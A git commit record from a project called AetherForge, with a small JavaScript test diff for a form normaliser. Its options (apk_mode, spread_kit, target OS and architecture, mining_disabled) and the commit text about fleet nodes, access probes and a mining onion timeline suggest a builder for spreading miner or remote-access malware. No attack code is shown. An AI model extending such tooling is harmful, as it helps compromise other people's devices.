Add Android APK fleet nodes with Crucible UI integration and tests.

APK wrapper registers platform=android via AETHERFORGE_PLATFORM; fleet UI shows robot icons, Android Access Depth probes, and a shortened mining onion timeline.
This commit is contained in:
AetherForge
2026-06-07 02:44:29 -07:00
parent d9f36f182c
commit 50ebfe53cb
89 changed files with 2849 additions and 82 deletions

View File

@@ -29,6 +29,15 @@ describe('forgeFormNormalize', () => {
expect(deriveDeliverableType(baseForm())).toBe('single');
});
it('apk mode forces android arm64 and clears fusion', () => {
const out = normalizeForgeForm(baseForm({ apk_mode: true, fusion_enabled: true, target_os: 'windows' }));
expect(out.apk_mode).toBe(true);
expect(out.target_os).toBe('android');
expect(out.target_arch).toBe('arm64');
expect(out.fusion_enabled).toBe(false);
expect(out.mining_disabled).toBe(true);
});
it('spread kit forces universal and clears fusion', () => {
const out = normalizeForgeForm(baseForm({ spread_kit: true, fusion_enabled: true, target_os: 'windows' }));
expect(out.spread_kit).toBe(true);